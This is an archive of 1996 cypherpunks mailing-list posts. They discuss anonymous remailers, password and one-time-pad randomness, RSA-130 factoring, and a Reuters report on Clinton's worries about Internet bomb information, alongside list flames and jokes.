>               Which is worse, genetic slavery or "dirty duck" photos ?
> 
Um, what's the duck doing?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 17 Apr 1996 16:31:53 +0800
To: cypherpunks@toad.com
Subject: Re: List of reliable remailers
In-Reply-To: <199604162100.RAA15552@jekyll.piermont.com>
Message-ID: <104JmD148w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

>
> Adam Pingitore writes:
> >           GET ME OFF THIS DAMN LIST
>
> No. I categorically refuse to take you off this mailing list.  I will
> not lift a finger.

I won't do anything either, and urge others to just ignore these rude people.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rwaldrip@vdospk.com
Date: Sun, 21 Apr 1996 02:09:17 +0800
Subject: Puffer?
Message-ID: <316DBE61.5D97@vdospk.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone use Puffer? Tell me about your experience with it. I just 
got it installed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Thu, 18 Apr 1996 12:10:18 +0800
To: "'Jim Byrd'" <cypherpunks@toad.com>
Subject: RE: Anonymous Remailer threat: Scientologists may subpoena  anonymous remailer records?
Message-ID: <01BB2BAC.D6DD0980@king1-18.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain




----------

"Scamizdat" has never used anon.penet.fi, and his (their?) identity is still
unknown.
>>If A.R.S. is archived by one of those services, than all of those 
Scamidat postings are still available. Or is the CO$  going to sue them too?
 Can they retrieve any data from the cypherpunk/mixmaster remailers?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Rothke <ben.rothke@citicorp.com>
Date: Thu, 18 Apr 1996 03:38:20 +0800
To: "'cypherpunks@toad.com>
Subject: Spaces in passwords
Message-ID: <199604171502.AA17527@egate.citicorp.com>
MIME-Version: 1.0
Content-Type: text/plain




Do spaces (ASCII 20) in passwords make them less secure?

I was speaking with a security admin who feels that spaces decrease the effectiveness of 
passwords.

I thought that they would actually do the opposite & increase password efficacy, as most 
password dictionary attacks do not attempt to attack embedded spaces. An attack trying to 
penetrate embedded spaces would seem to make the dictionary orders or magnitude larger.

Any comments?

Ben

------------------------------------------------------------
The views expressed are exclusively my own & not that of my employer
-----------------------------------------------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 18 Apr 1996 03:24:48 +0800
To: cypherpunks@toad.com
Subject: Fascist takes another bite
Message-ID: <199604171436.HAA24624@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Reuters, 4/17/96:

Clinton worried Internet may help arm terrorists
     
TOKYO, April 17 (Reuter) - U.S. President Bill Clinton said on Wednesday he
was worried the Internet was aiding international terrorism by making it too
easy for sinister forces to learn how to make bombs or produce nerve gas.
     
"Are people learning, for example, from the Internet how to make the same
sort of trouble in the United States that was made in Japan with sarin gas?"
Clinton said at a news conference with Japanese Prime Minister Ryutaro 
Hashimoto in Tokyo.
     
"Isn't it a concern that anybody, anywhere in the world, can pull down off
the Internet the information about how to build a bomb like the bomb that 
blew up the Federal Building in Oklahoma City?" he added.
     
Clinton said Japan and the United States, both victims of home-grown
terrorism last year, should learn from each other about how to deal with the
issue.

In the United States anti-government groups are linked "like no rebel force
has ever been" by the Internet and fax, the Southern Poverty Law Center, a 
group which campaigns for civil rights, said in a report released last week.
     
Anti-government right-wing activism has been linked to the Oklahoma blast
in which a truck bomb destroyed a federal building and killed 168 people on
April 19, 1995.
     
Information on how to construct a similar bomb is available to anyone
around the world with Internet access.
     
Meanwhile in Japan, the doomsday cult Aum Shinri Kyo (Supreme Truth Sect)
was able to download from the Internet a formula for synthesising green-mamba
snake venom, according to a recent magazine report.
     
The sect is also believed to have been looking to procure samples of the
lethal ebola virus.

Cult leader Shoko Asahara goes on trial on April 24 charged with the murder
of 25 people, including 11 who died in a sarin nerve gas attack on the Tokyo
subway on March 20, 1995.
     
About 5,000 other commuters where taken ill in the incident.
     Clinton also told the news conference that in the next 20 years "every
great nation will have to face" the question of terrorist access to the
Internet.

 Clinton called acts of terrorism, whether home-grown or international, "a
genuine threat not only to the lives of the innocent civilians who may be 
killed in them, but to the whole idea of an open, civilised society in a 
global economy."
     
Clinton's comments on the Internet were in response to a question about his
thoughts on terrorism.
     
He said nations must ask "how can we work together to learn with each other
about how to prevent these things before they occur, when they're purely
domestically driven, as well as sharing information and technology and law
enforcement about the international terrorist networks that are out there?"
  REUTER





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Thu, 18 Apr 1996 00:52:22 +0800
To: cypherpunks@toad.com
Subject: Clinton blathering about Internet terror
Message-ID: <3174E9EC.4087@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


See http://www.yahoo.com/headlines/960417/news/stories/internet_1.html.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Thu, 18 Apr 1996 06:41:39 +0800
To: hoz@univel.telescan.com
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <199604161843.LAA19508@toad.com>
Message-ID: <l3Qdx8m9L0IU085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199604161843.LAA19508@toad.com>,
rick hoselton <hoz@univel.telescan.com> wrote:

> At 10:07 AM 4/16/96 -0400, Perry E. Metzger wrote:
> 
> >...Usually, random
> >sequences are non-compressable, but it is possible (though very
> >improbable) for Hamlet to appear out of a random number generator,
> >and it is of course quite compressable...
> 
> But even if it came from a completely random source, it would 
> still make a bad one-time pad.  When people say "compressable" 
> or "algorithmic complexity" or "random", a context is always implied.  
> 
> In the context of "fair coin flips" the text of Hamlet is NOT compressible.
> Because no string is more likely than any other.  Any algorithm that could 
> compress that string, will, on the average INCREASE the length of 
> "fair coin flip" strings it tries to compress.
> 
> Under the context of "pads that might be used for cryptographic purposes" the 
> text of Hamlet is quite compressible.  An attacker is much more likely to 
> test for such a stream than one that appears more random.  So, even if you 
> got "Hamlet" from a perfectly random source, you should reject it for crypto 
> purposes.

This thread is becoming isomorphic to one that took place on the
Coderpunks list.  Jonathan Wienke was promoting an idea to make the
output of a PRNG "more" random by throwing away output whose statistics
didn't match the ideal statistics of an ideal RNG.  Critics of this
scheme (including Perry) argued along these lines:

Suppose you think that quotes from Hamlet don't belong in your OTP
keystream, and so you filter them out.  In doing so, you are making your
keystream *less* random, not more, because you are making some bit
sequences more likely than others.

Given that Hamlet quotes aren't very likely, you aren't making your
keystream very much weaker, but you *are* weakening it.  

See the Coderpunks archives for more details on this argument.

- -- 
Alan Bostick               | They say in online country there is no middle way
mailto:abostick@netcom.com | You'll either be a Usenet man or a thug for the CDA
news:alt.grelb             |    Simon Spero (after Tom Glazer)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMXUQuuVevBgtmhnpAQHZpgMApBbI3CPieZc/V/vQt5vAqHX/XcRqWjg3
Rilta9XizlIfq7BYS4NKefov7t2kAW+cgsWESC17rJ7gkXCYIsdvaGg4q1uunDG+
0MXhL406zQbcsPy3iUROGHFIz+IRvkNY
=qjiR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Date: Thu, 18 Apr 1996 01:56:10 +0800
To: perry@piermont.com
Subject: Re[2]: on corporations and subpoenas
Message-ID: <9603178297.AA829755045@ccmail.wnyric.org>
MIME-Version: 1.0
Content-Type: text/plain


          Um, well, then I'm going to have to spam your ass.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Marshall <brucem@wichita.fn.net>
Date: Thu, 18 Apr 1996 01:45:05 +0800
To: cypherpunks@toad.com
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
In-Reply-To: <199604170014.RAA07011@netcom3.netcom.com>
Message-ID: <Pine.BSI.3.91.960417083229.17657A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Apr 1996, Vladimir Z. Nuri wrote:

> >On Mon, 15 Apr 1996, Vladimir Z. Nuri wrote:

> >    I guess I would have to ask you why you think hackers would be 
> >interested in these projects in the first place?  Your typical hacker 
> >would care very little about such a project and in fact may be interested 
> >in seeing it succeed.  
> 
> the malicious type of hacker has the psychology of taking
> great glee in tearing anything meaningful down. they don't
> necessarily need a plausible reason. the purpose of destruction
> alone can be a powerful motivating force. those who destroy
> carefully constructed things for fun obtain a sense of power from it.

	True.  Yet, my estimate as to the number of 'malicious hackers' 
that would take interest in disturbing such a project (and have the 
ability to do so) is very low.  

	That number would increase though if you were the NSA or any other 
agency perceived as Big Brother, since the hackers would probably see 
your efforts as a threat. 

> >    However, I do feel that you may have a valid point when switching 
> >"hackers" to "opponents of the research."  Anyone with an interest in 
> >preventing or slowing down the progress in such a project would be more 
> >dangerous in my mind than your average hacker.  

> the point is, when you are sharing your project among a lot of 
> elements "out there" on a network, you have to worry more and 
> more about "safe computing". when you are working on a purely
> voluntary basis, what is your guarantee that everyone who volunteers
> is actually on your side? again, a bigger problem the more a 
> task is decentralized. one interesting argument in favor of centralized 
> computing (I'm not saying it is a definitive argument, quite far
> from that of course-- just pointing out that Distribution is
> not necessarily the Panacea to All Problems).

	In every aspect of life we have to deal with the threat of 
someone working to counteract our efforts.  However, to continue 
functioning we rate these threats as probable or inprobable and deal with 
them accordingly.  I don't see skewed results, due to falsifying or 
tampering with records, as being a very probable threat in the present 
especially when you are dealing with volunteers.  That threat would 
increase in magnitude when you start paying people for computer time (as 
they typically have less of a loyalty bond to you than volunteers would) 
or if a person would benefit by corrupting the data (such as in the 
case of a competition).

Bruce Marshall




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Thu, 18 Apr 1996 07:22:29 +0800
To: ses@tipper.oit.unc.edu
Subject: Re: CDA Court Challenge: Update #7 (Ducks on the Net)
In-Reply-To: <Pine.SOL.3.91.960415222001.679A-100000@chivalry>
Message-ID: <OJRdx8m9L0KT085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SOL.3.91.960415222001.679A-100000@chivalry>,
Simon Spero <ses@tipper.oit.unc.edu> wrote:

> Dash it Declan, I spent a hard day up to my eyeballs in ASN.1. When I 
> get home I want something cute to look at. Where are the darn  ducks?
> 
> Simon

ME T00!!!!1!

PUT ME ON THE L1ST111!1

SUBSCRIVE

-- 
Alan Bostick               | They say in online country there is no middle way
mailto:abostick@netcom.com | You'll either be a Usenet man or a thug for the CDA
news:alt.grelb             |    Simon Spero (after Tom Glazer)
http://www.alumni.caltech.edu/~abostick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 18 Apr 1996 03:52:33 +0800
To: Mike McNally <cypherpunks@toad.com
Subject: Re: Clinton blathering about Internet terror
Message-ID: <m0u9ZZf-00092EC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:54 AM 4/17/96 -0500, Mike McNally wrote:
>See http://www.yahoo.com/headlines/960417/news/stories/internet_1.html.

But he's still dishonestly trying to make it look like the danger is to ordinary individuals, rather than government functionaries.

>From the news item addressed above:

>In the United States anti-government groups are linked ``like no rebel force 
>has ever been'' by the Internet and fax, the Southern Poverty Law Center, a 
>group which campaigns for civil rights, said in a report released last week. 

So what's wrong with this?

Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 18 Apr 1996 03:50:54 +0800
To: cypherpunks@toad.com
Subject: Re: What's the "Human Interaction Institute" at CMU For ???
Message-ID: <m0u9ZdY-00092lC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:28 AM 4/17/96 -6, Peter Trei wrote:
>>           PS: If anyone can tell me the name of the 1965 movie
>>           starring Michael Renee that dealt with the above two issues,
>>           please tell me.
>> 
>>           If you were not aware, the movie dealt with a plan,
>>           initially, to link all humanity directly to each other. One
>>           could "download" data directly into your brain ! You could
>>           also have "mental telepathy" and communicate with others.
>>           Michael Renee's character escapes to the past to try to end
>>           research done by a scientist, that lead up to the inevitable
>> 
>>           a totalitarian world government takes control of everyone;
>> 
>>           even your thoughts are no longer private.

>I strongly suspect that you are refering to "Cyborg 2087" aka
>"The Man from Tomorrow" a 1966 film starring Micheal Rennie
>(note spelling).
>It took about 2 minutes to track this down on the net.
>Peter Trei

A different (and rather funny) treatment of a similar concept was done in 
the 1967 (?) movie, "The President's Analyst," with James Coburn, Godfrey 
Cambridge, Severn Darden. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Thomlinson <mattt@microsoft.com>
Date: Thu, 18 Apr 1996 04:10:06 +0800
To: "'jya@pipeline.com>
Subject: COQ_tal
Message-ID: <c=US%a=_%p=msft%l=RED-77-MSG-960417155817Z-8170@red-07-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rick hoselton <hoz@univel.telescan.com>
Date: Thu, 18 Apr 1996 04:45:08 +0800
To: cypherpunks@toad.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <199604171558.IAA02972@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:12 PM 4/16/96 -0400, Perry E. Metzger wrote:

>> Are you sure you want to claim that the text of Hamlet would make 
>> a good key for a one-time pad?

... much deleted ....

>It is far, far more probable for the cryptanalyst, thinking the
>key was "Hamlet", to get out a plausible but totally bogus text, than
>it is for the key to actually be "Hamlet". 

I can agree with this.

>Of course, it is also far,
>far more probable for you to be stupid than for a random number
>generator to put out "Hamlet".

I agree here too.  I've been stupid many times, but 
I never expect to see a fair random number 
generator produce Hamlet.  (I should live so long!)

>but if you go around getting rid of
>RNGs that produce "Hamlet" or anything close, you have in theory given
>information to the attacker that gives them a slightly better chance
>of attacking you since your pads are no longer purely random.

And I could agree with this too, except that cryptanalysts do not 
consider every string to be equally likely.  If they did, they would 
never even bother to look at XORing a bitstream with ciphertext to 
produce plaintext.  

>The reason all this isn't stupid to discuss and actually has some
>importance is just this fact. If you build a system that discards
>things that "don't look like they have enough entropy" (which certain
>people around here have proposed), you are giving the cryptanalyst a
>very strong piece of information about the key, so your key is no
>longer totally unpredictable. 

This is true.  But it is also unavoidable.  Actually, I'm pleased to give 
up one-percent of my keyspace, if that's the one-percent that an analyst 
will check first.

Another example: What if I selected a nonsense passphrase, 
"Dagmar shaved Howard's cocker spaniel"  Not great, but adequate for my needs.
If, by some wild coindence, a book by that title became a best seller, I would 
change my passphrase.  A cryptanalyst who knew that was my feeling could
simplify 
his cracking by not bothering to search for best selling book titles.  On
the other 
hand, a cryptanalyst who was not so convinced of my paranoia, and who DID check 
book titles, would not find my passphrase.  I assume that BOTH philosophies 
would be used in a serious attack.  When I do the math, it says that, assuming 
BOTH types of attack are done, it is better to have a passphrase that is not 
the title of a book. 

>An irony, but something important to
>keep in mind. Every once in a while (once in every four billion bits,
>or so) your random number generator will put out 32 1's in a row if it
>is functioning properly. 

Agreed.  And if that produces a "weak key" for your cipher, you'll get broken.

>Any given small segment of the output of a
>good RNG might not look "random", but "random" isn't a property of a
>given number -- it is the property of the infinite sequence itself.

I agree here too.  But the analyst doesn't see the infinite sequence, 
only the number itself.

I am enjoying this discussion, but I feel like I'm running out of 
useful new ways to try to express this idea.  If I don't reply, 
it doesn't mean you have convinced me. :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Thomlinson <mattt@microsoft.com>
Date: Thu, 18 Apr 1996 04:01:00 +0800
To: "'jya@pipeline.com>
Subject: RE: COQ_tal
Message-ID: <c=US%a=_%p=msft%l=RED-77-MSG-960417155912Z-8177@red-06-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


damn, that's the second time I've done that this week! dang 'R' key.. 

apologies, 

mattt
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 18 Apr 1996 04:08:56 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: [NOISE] Bizdos /  A hacker's paradise
In-Reply-To: <199604170230.WAA00997@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.960417085958.2935A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



1) Wasn't hacker's paradise the theme to Dangerously Mindless?
 Tell me why are we so blind to see
 That the code we need is on ftp

2) I keep getting wierd mental pictures of Jim Bizdos in that Saturday 
Night Live sketch
   "You likea the source? It's a good source. Hey, he no likea the source"


---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 18 Apr 1996 00:39:17 +0800
To: cypherpunks@toad.com
Subject: Re: What's the "Human Interaction Institute" at CMU For ???
Message-ID: <199604171319.GAA01301@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
>           The title could refer to net censorship, or to bio-medical
>           implantation of control computers inside human brains.

>           Stephen S.
>           salgaller@ccgate.hac.com
>           or try:
>           salgaller@aol.com
> 
>           PS: If anyone can tell me the name of the 1965 movie
>           starring Michael Renee that dealt with the above two issues,
>           please tell me.
> 
>           If you were not aware, the movie dealt with a plan,
>           initially, to link all humanity directly to each other. One
>           could "download" data directly into your brain ! You could
>           also have "mental telepathy" and communicate with others.
>           Michael Renee's character escapes to the past to try to end
>           research done by a scientist, that lead up to the inevitable
> 
>           a totalitarian world government takes control of everyone;
> 
>           even your thoughts are no longer private.
> 
>           You get the idea. This was also done as part of the movie
>           "Terminator 2"; I wonder if the writer of the 1965 movie got
>           any screen credit or royalties for T2 ???
> 
>           I'm worrying too much, right ? It can't happen here ???
>           Tim Mc Veigh said he had a bio chip implant. Nah...

I strongly suspect that you are refering to "Cyborg 2087" aka
"The Man from Tomorrow" a 1966 film starring Micheal Rennie
(note spelling).

It took about 2 minutes to track this down on the net.

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Thu, 18 Apr 1996 05:35:28 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: "STOP SENDING ME THIS SHIT"
In-Reply-To: <Pine.SUN.3.91.960417042451.14115A-100000@polaris.mindport.net>
Message-ID: <199604171641.JAA26692@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I think the "clueless" mailing list is a must at this point.

	clueless@c2.org/majordomo@c2.org

	subscribe idiots as necessary.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 18 Apr 1996 02:33:58 +0800
To: ssalgaller@CCGATE.HAC.COM
Subject: Re: What's the "Human Interaction Institute" at CMU For ???
In-Reply-To: <9603168296.AA829695326@CCGATE.HAC.COM>
Message-ID: <clRDn1u00YUv83cLd5@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 16-Apr-96 What's the "Human
Interacti.. by ssalgaller@CCGATE.HAC.CO 
>           Re: Subject, what is Dan Olsen going to be in charge of at
>           CMU ? (ref: CDA debate; expert witness for the CDA)
>  
>           The title could refer to net censorship, or to bio-medical
>           implantation of control computers inside human brains.

Olsen's expertise seems to lie in the area of user interfaces.

Though you never know what those kooky geeks are thinking of over in
Wean Hall...

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 18 Apr 1996 06:17:56 +0800
To: cypherpunks@toad.com
Subject: Re: Clinton blathering about Internet terror
In-Reply-To: <3174E9EC.4087@vail.tivoli.com>
Message-ID: <Pine.ULT.3.92.960417101323.29708C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 17 Apr 1996, Mike McNally wrote:

> See http://www.yahoo.com/headlines/960417/news/stories/internet_1.html.

To be fair, I don't see any blathering, just "expressions of concern." The
blathering quote comes from the SPLC, not Clinton.

Clinton, though, is pushing the unconstitutional "anti-terrorism"  bill,
which is all blather, and worse, he's letting the Republicans add an
unrelated rider that emasculates habeus corpus.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 18 Apr 1996 02:44:45 +0800
To: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Subject: Re: Re[2]: on corporations and subpoenas
In-Reply-To: <9603178297.AA829755045@ccmail.wnyric.org>
Message-ID: <0lRDrmC00YUv83cMoK@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 17-Apr-96 Re[2]: on corporations and
.. by "Adam Pingitore"@alli.wn 
>           Um, well, then I'm going to have to spam your ass.

My dearest Adam:

If I tell you to rot and die, will you "spam my ass" too?

Sincerely,

A friend





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 18 Apr 1996 02:36:42 +0800
To: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Subject: Re: Re[2]: on corporations and subpoenas
In-Reply-To: <9603178297.AA829755045@ccmail.wnyric.org>
Message-ID: <199604171420.KAA05284@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Adam Pingitore" writes:
>           Um, well, then I'm going to have to spam your ass.

Not a finger raised. I will do nothing whatsoever to take you off this
mailing list.

Have fun.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Apr 1996 05:56:27 +0800
To: cypherpunks@toad.com
Subject: Clinton worried books may help arm terrorists
Message-ID: <ad9a6f90120210047913@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Roiters, 4/17/96:

Clinton worried books may help arm terrorists

TOKYO, April 17 (Roiter) - U.S. President Bill Clinton said on Wednesday he
was worried that books are aiding international terrorism by making it too
easy for sinister forces to learn how to make bombs or produce nerve gas.

"Are people learning, for example, from reading how to make the same
sort of trouble in the United States that was made in Japan with sarin gas?"
Clinton said at a news conference with Japanese Prime Minister Ryutaro
Hashimoto in Tokyo.

"Isn't it a concern that anybody, anywhere in the world, can find books and
encyclopedia articles about how to build a bomb like the bomb that
blew up the Federal Building in Oklahoma City?" he added.

Clinton said Japan and the United States, both victims of home-grown
terrorism last year, should learn from each other about how to deal with the
dangerous issue of unauthorized reading.

>From Tokyo, President Clinton is to fly to North Korea to discuss North
Korea's successful campaign to limit access to books and reading.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 18 Apr 1996 07:47:04 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: A possible problem with more regulation possible?
Message-ID: <m0u9bA6-0008xzC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:17 PM 4/16/96 EDT, E. ALLEN SMITH wrote:
>	This proposal would appear to increase vulnerability to regulation.
>	-Allen
>
>From:	IN%"educom@elanor.oit.unc.edu"  7-APR-1996 18:42:00.83
>
>>MORE ROUTERS = MORE INTERNET BROWNOUTS
>>As businesses and Internet operators keep adding routers to speed electronic
>>content on its way, the proliferation of routing devices actually begins to
>>slow traffic, causing Internet "brownouts" -- when the response time slows
>>to a crawl.  The solution could be an updated Internet, redesigned for
>>fewer, more powerful routers, so that data packets need fewer hops.  "The
>>U.S. Internet is about as reliable these days as the phone system in
>>Russia," says NetStar's VP for sales and marketing.  (Business Week 8 Apr 96
>>p82)


I'd like to hear of some estimates of the cost (total, and per-user) of 
installing the system, and running Internet on a daily basis.  They are 
spread out over a large number of entities, but I'd think they could be 
estimated with at least a factor-of-two precision.

What are the costs of laying fiber?  Switching equipment? etc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 18 Apr 1996 03:41:28 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: [IRS] Elvis in Escrow
In-Reply-To: <199604162254.PAA01128@netcom9.netcom.com>
Message-ID: <Pine.BSF.3.91.960417105233.5781F-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Apr 1996, Bill Frantz wrote:

> At  4:40 AM 4/16/96 -0700, Dave Del Torto wrote:
> >[from SF Examiner somewhere around 12-14 April 96]
> >
> >..............................................................................
> >
> >"IRS Worker Took Peek at Celebrities' Records"
> >[Associated Press]
> >  Memphis - A former IRS employee who said boredom had led him to peek at
> >the tax records of President Clinton, Elvis Presley and other famous people
> >has been acquitted of federal charges.
> >^^^^^^^^^^^^^^^^^^

"acquitted" here may mean that cypherpunks were on the trial jury.

If the "fix" was in, as Dave seems to imply, there never would've been a 
trial.

EBD




> >
> >Hmmm. _We_ do it, it's "malicious cracking/hacking" and they toss us in the
> >clink... _they_ do it, and it's "practice" (and they get acquitted). And
> >_these_ are the people who want to escrow _my_ keys? As IF!
> 
> I wonder, how much is NSA's secret key worth?  You know, the one they use
> to grab the extra key bits that Lotus Notes sends them.
> 
> 
> Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
> frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA




Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Apr 1996 06:44:27 +0800
To: cypherpunks@toad.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <ad9a78940002100474f5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:46 PM 4/17/96, Henry Huang wrote:

>Well good.  Better nonstandardized chaos than a single, arbitrarily
>defined and applied system.  (Ref: "Parental Advisory" stickers, which
>were IMHO totally useless, and a doomed concept from the start.)

These stickers on CDs were actually very useful. Kids could spot more
quickly the juicy stuff. The taste of forbidden fruit is so much better.

Likewise, the "age bit" that some are talking about will be similarly
useful. Minors will be unambiguously identified--no more "is she or isn't
she?"--and actions taken accordingly.

(Several years from now, I see a great hue and cry over the fact that the
"age bit" mandated by "The Children's Internet Protection Act of 1997" will
be used to deny the protection of adult-seeming personnas to children.
Pedophiles and the like will find their tasks easier, and the Act's
supporters will say "But that's not what we intended!!")

I saw a reference to this in the archives of the Cyberia list, though I am
no longer subscribed to it. Not sure who first pointed it out, but it's a
valid point.

--Tim May

THE X-ON CONGRESS:  INDECENT COMMENT ON AN INDECENT SUBJECT, by Steve
Russell, American Reporter Correspondent....You motherfuckers in Congress
have dropped over the edge of the earth this time... "the sorriest bunch
of cocksuckers ever to sell out the First Amendment" or suggesting that
"the only reason to run for Congress these days is to suck the lobbyists'
dicks and fuck the people who sent you there," ....any more than I care
for the language you shitheads have forced me to use in this
essay...Let's talk about this fucking indecent language bullshit.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Apr 1996 13:10:12 +0800
To: Matt Thomlinson <cypherpunks@toad.com>
Subject: RE: COQ_tal--comment
Message-ID: <ad9a7b1f010210040dc6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:59 PM 4/17/96, Matt Thomlinson wrote:
>damn, that's the second time I've done that this week! dang 'R' key..
>
>apologies,
>
>mattt


By the way, Matt, thanks for mentioning this on the list.

As this was the second time I'd seen this, I was about to send you a short
note mentioning that your requests to John's bot were also going to the
list (in case you didn't know). I suspect at least 5 or maybe 10 others
were thinking about doing the same thing.

So, your acknowledgement helps. (This is the same reason I think most
replies ought to be public, as this one will be: it signals others that a
reply has been made. Standard game theory arguments.)

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Date: Thu, 18 Apr 1996 09:29:36 +0800
